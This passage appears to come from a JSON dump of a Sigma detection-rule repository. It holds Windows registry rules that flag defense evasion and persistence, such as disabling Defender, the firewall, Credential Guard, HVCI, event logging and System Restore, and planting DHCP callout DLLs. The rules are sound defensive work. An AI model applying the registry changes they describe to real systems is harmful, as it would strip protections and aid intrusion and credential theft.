car.2022-03-001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\MiniNt\\(Default)'\n    condition: selection\nfalsepositives:\n    - Highly Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml",
    "content": "title: Service Binary in Suspicious Folder\nid: a07f0359-4c90-4dc4-a681-8ffea40b4f47\nrelated:\n    - id: c0abc838-36b0-47c9-b3b3-a90c39455382\n      type: obsolete\nstatus: test\ndescription: Detect the creation of a service with a service binary located in a suspicious directory\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Florian Roth (Nextron Systems), frack113\ndate: 2022-05-02\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_service_start:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\Start'\n        Image|contains:\n            - '\\Users\\Public\\'\n            - '\\Perflogs\\'\n            - '\\ADMIN$\\'\n            - '\\Temp\\'\n        Details:\n            - 'DWORD (0x00000000)'  # boot\n            - 'DWORD (0x00000001)'  # System\n            - 'DWORD (0x00000002)'  # Automatic\n            # 3 - Manual , 4 - Disabled\n    selection_service_imagepath:\n        TargetObject|startswith: 'HKLM\\System\\CurrentControlSet\\Services\\'\n        TargetObject|endswith: '\\ImagePath'\n        Details|contains:\n            - '\\Users\\Public\\'\n            - '\\Perflogs\\'\n            - '\\ADMIN$\\'\n            - '\\Temp\\'\n    filter_optional_avast:\n        Image|contains|all: # Filter FP with Avast software\n            - '\\Common Files\\'\n            - '\\Temp\\'\n    filter_optional_mbamservice:\n        TargetObject|endswith: '\\CurrentControlSet\\Services\\MBAMInstallerService\\ImagePath'\n        Details|endswith: '\\AppData\\Local\\Temp\\MBAMInstallerService.exe\"'\n        Image: 'C:\\Windows\\system32\\services.exe'\n    condition: 1 of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_credential_guard_disabled.yml",
    "content": "title: Windows Credential Guard Disabled - Registry\nid: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0\nrelated:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nreferences:\n    - https://woshub.com/disable-credential-guard-windows/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\DeviceGuard\\EnableVirtualizationBasedSecurity'\n            - '\\DeviceGuard\\LsaCfgFlags'\n            - '\\Lsa\\LsaCfgFlags'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml",
    "content": "title: Custom File Open Handler Executes PowerShell\nid: 7530b96f-ad8e-431d-a04d-ac85cc461fdc\nstatus: test\ndescription: Detects the abuse of custom file open handler, executing powershell\nreferences:\n    - https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728\nauthor: CD_R0M_\ndate: 2022-06-11\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'shell\\open\\command\\'\n        Details|contains|all:\n            - 'powershell'\n            - '-command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml",
    "content": "title: Potential Registry Persistence Attempt Via DbgManagedDebugger\nid: 9827ae57-3802-418f-994b-d5ecf5cd974b\nstatus: test\ndescription: Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes\nreferences:\n    - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\n    - https://github.com/last-byte/PersistenceSniper\nauthor: frack113\ndate: 2022-08-07\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Microsoft\\.NETFramework\\DbgManagedDebugger'\n    filter:\n        Details: '\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate use of the key to setup a debugger. Which is often the case on developers machines\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_defender_exclusions.yml",
    "content": "title: Windows Defender Exclusions Added - Registry\nid: a982fc9c-6333-4ffb-a51d-addb04e8b529\nrelated:\n    - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f\n      type: derived\nstatus: test\ndescription: Detects the Setting of Windows Defender Exclusions\nreferences:\n    - https://twitter.com/_nullbind/status/1204923340810543109\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-07-06\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection2:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Exclusions'\n    condition: selection2\nfalsepositives:\n    - Administrator actions\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_desktop_background_change.yml",
    "content": "title: Potentially Suspicious Desktop Background Change Via Registry\nid: 85b88e05-dadc-430b-8a9e-53ff1cd30aae\nrelated:\n    - id: 8cbc9475-8d05-4e27-9c32-df960716c701\n      type: similar\nstatus: test\ndescription: |\n    Detects registry value settings that would replace the user's desktop background.\n    This is a common technique used by malware to change the desktop background to a ransom note or other image.\nreferences:\n    - https://www.attackiq.com/2023/09/20/emulating-rhysida/\n    - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\n    - https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html\n    - https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nauthor: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)\ndate: 2023-12-21\nmodified: 2025-10-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1112\n    - attack.t1491.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_keys:\n        TargetObject|contains:\n            - 'Control Panel\\Desktop'\n            - 'CurrentVersion\\Policies\\ActiveDesktop'\n            - 'CurrentVersion\\Policies\\System'\n    selection_values_1:\n        TargetObject|endswith: 'NoChangingWallpaper'\n        Details: 'DWORD (0x00000001)' # Prevent changing desktop background\n    selection_values_2:\n        TargetObject|endswith: '\\Wallpaper'\n    selection_values_3:\n        TargetObject|endswith: '\\WallpaperStyle'\n        Details: '2' # Stretch\n    filter_main_svchost:\n        # Note: Excluding GPO changes\n        Image|endswith: '\\svchost.exe'\n    filter_main_empty:\n        TargetObject|endswith: '\\Control Panel\\Desktop\\Wallpaper'\n        Details: '(Empty)'\n    filter_main_explorer:\n        # Normally Explorer.exe is the process that changes the desktop background\n        Image|endswith: 'C:\\Windows\\Explorer.EXE'\n    filter_optional_ec2launch:\n        Image:\n            - 'C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe'\n            - 'C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe'\n        TargetObject|endswith: '\\Control Panel\\Desktop\\Wallpaper'\n    condition: selection_keys and 1 of selection_values_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative scripts that change the desktop background to a company logo or other image.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_devdrv_disallow_antivirus_filter.yml",
    "content": "title: Antivirus Filter Driver Disallowed On Dev Drive - Registry\nid: 31e124fb-5dc4-42a0-83b3-44a69c77b271\nstatus: test\ndescription: |\n    Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a \"Dev Drive\".\nreferences:\n    - https://twitter.com/0gtweet/status/1720419490519752955\nauthor: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-11-05\nmodified: 2024-08-16\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml",
    "content": "title: Windows Hypervisor Enforced Code Integrity Disabled\nid: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\nrelated:\n    - id: 6225c53a-a96e-4235-b28f-8d7997cd96eb\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel\nreferences:\n    - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/\n    - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci\nauthor: Nasreddine Bencherchali (Nextron Systems), Anish Bogati\ndate: 2023-03-14\nmodified: 2024-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Control\\DeviceGuard\\HypervisorEnforcedCodeIntegrity'\n            - '\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled'\n            - '\\Microsoft\\Windows\\DeviceGuard\\HypervisorEnforcedCodeIntegrity'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate system administration tasks that require disabling HVCI for troubleshooting purposes when certain drivers or applications are incompatible with it.\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Hypervisor-Enforced Code Integrity (HVCI)\n      technique: T1562.001\n      atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml",
    "content": "title: Hypervisor Enforced Paging Translation Disabled\nid: 7f2954d2-99c2-4d42-a065-ca36740f187b\nstatus: test\ndescription: |\n    Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry value. Where the it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.\nreferences:\n    - https://twitter.com/standa_t/status/1808868985678803222\n    - https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\DisableHypervisorEnforcedPagingTranslation'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml",
    "content": "title: DHCP Callout DLL Installation\nid: 9d3436ef-9476-4c43-acca-90ce06bdf33a\nstatus: test\ndescription: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)\nreferences:\n    - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\n    - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\n    - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx\nauthor: Dimitrios Slamaris\ndate: 2017-05-15\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\Services\\DHCPServer\\Parameters\\CalloutDlls'\n            - '\\Services\\DHCPServer\\Parameters\\CalloutEnabled'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml",
    "content": "title: Disable Administrative Share Creation at Startup\nid: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e\nstatus: test\ndescription: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\LanmanServer\\Parameters\\'\n        TargetObject|endswith:\n            - '\\AutoShareWks'\n            - '\\AutoShareServer'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Administrative Share Creation at Startup\n      technique: T1070.005\n      atomic_guid: 99c657aa-ebeb-4179-a665-69288fdd12b8\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml",
    "content": "title: Potential AutoLogger Sessions Tampering\nid: f37b4bce-49d0-4087-9f5b-58bffda77316\nstatus: test\ndescription: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging\nreferences:\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_main:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\'\n    selection_values:\n        TargetObject|contains: # We only care about some autologger to avoid FP. Add more if you need\n            - '\\EventLog-'\n            - '\\Defender'\n        TargetObject|endswith:\n            - '\\Enable'\n            - '\\Start'\n        Details: DWORD (0x00000000)\n    filter_main_wevtutil:\n        Image: 'C:\\Windows\\system32\\wevtutil.exe'\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n        TargetObject|contains:\n            - '\\DefenderApiLogger\\'\n            - '\\DefenderAuditLogger\\'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml",
    "content": "title: Disable Microsoft Defender Firewall via Registry\nid: 974515da-6cc5-4c95-ae65-f97f9150ec7f\nstatus: test\ndescription: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\nauthor: frack113\ndate: 2022-01-09\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\\EnableFirewall\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall\n        # HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\EnableFirewall\n        TargetObject|contains: '\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\'\n        TargetObject|endswith: '\\EnableFirewall'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Microsoft Defender Firewall via Registry\n      technique: T1562.004\n      atomic_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_function_user.yml",
    "content": "title: Disable Internal Tools or Feature in Registry\nid: e2482f8d-3443-4237-b906-cc145d87a076\nstatus: test\ndescription: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\n    - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\n    - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html\n    - https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage\n    - https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl\n    - https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec\ndate: 2022-03-18\nmodified: 2025-06-04\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_set_1:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter'\n            - 'SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD'\n        Details: 'DWORD (0x00000001)'\n    selection_set_0:\n        TargetObject|endswith:\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n            - 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon'\n            - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled'\n            - 'SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection'\n            - 'SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_set_*\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml",
    "content": "title: Disable Macro Runtime Scan Scope\nid: ab871450-37dc-4a3a-997f-6662aa8ae0f1\ndescription: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros\nstatus: test\ndate: 2022-10-25\nmodified: 2023-08-17\nauthor: Nasreddine Bencherchali (Nextron Systems)\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/\n    - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\n    - https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\'\n            - '\\Microsoft\\Office\\'\n            - '\\Common\\Security'\n        TargetObject|endswith: '\\MacroRuntimeScanScope'\n        Details: DWORD (0x00000000)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml",
    "content": "title: Disable Privacy Settings Experience in Registry\nid: 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b\nstatus: test\ndescription: Detects registry modifications that disable Privacy Settings Experience\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md\nauthor: frack113\ndate: 2022-10-02\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate admin script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml",
    "content": "title: Disable Windows Security Center Notifications\nid: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6\nstatus: test\ndescription: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md\nauthor: frack113\ndate: 2022-08-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: 'Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Windows Security Center Notifications\n      technique: T1112\n      atomic_guid: 45914594-8df6-4ea9-b3cc-7eb9321a807e\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_system_restore.yml",
    "content": "title: Registry Disable System Restore\nid: 5de03871-5d46-4539-a82d-3aa992a69a83\nstatus: test\ndescription: Detects the modification of the registry to disable a system restore on the computer\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry\nauthor: frack113\ndate: 2022-04-04\nmodified: 2023-08-17\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Policies\\Microsoft\\Windows NT\\SystemRestore'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore'\n        TargetObject|endswith:\n            - DisableConfig\n            - DisableSR\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml",
    "content": "title: Windows Defender Service Disabled - Registry\nid: e1aa95de-610a-427d-b9e7-9b46cfafbe6a\nstatus: test\ndescription: Detects when an attacker or tool disables the  Windows Defender service (WinDefend) via the registry\nreferences:\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105\nauthor: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali\ndate: 2022-08-01\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|endswith: '\\Services\\WinDefend\\Start'\n        Details: 'DWORD (0x00000004)'\n    condition: selection\nfalsepositives:\n    - Administrator actions\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_event_log_access.yml",
    "content": "title: Windows Event Log Access Tampering Via Registry\nid: ba226dcf-d390-4642-b9af-b534872f1156\nstatus: experimental\ndescription: |\n    Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\nreferences:\n    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.002#atomic-test-8---modify-event-log-channel-access-permissions-via-registry---powershell\n    - https://www.youtube.com/watch?v=uSYvHUVU8xY\n    - https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language\nauthor: X__Junior\ndate: 2025-01-16\nmodified: 2025-08-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1547.001\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    # O:SYG:SYD:(D;;0x1;;;WD)\n    # O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(D;;0x1;;;WD)\n    selection_key_1:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\'\n        TargetObject|endswith: '\\CustomSD'\n    selection_key_2:\n        TargetObject|contains:\n            - '\\Policies\\Microsoft\\Windows\\EventLog\\'\n            - '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels'\n        TargetObject|endswith: '\\ChannelAccess'\n    selection_details:\n        - Details|contains: 'D:(D;'\n        - Details|contains|all:\n              - 'D:('\n              - ')(D;'\n    filter_main_trustedinstaller:\n        Image: 'C:\\Windows\\servicing\\TrustedInstaller.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    filter_optional_empty:\n        Image: ''\n    filter_optional_null:\n        Image: null\n    condition: 1 of selection_key_* and selection_details and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative activity, still unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml",
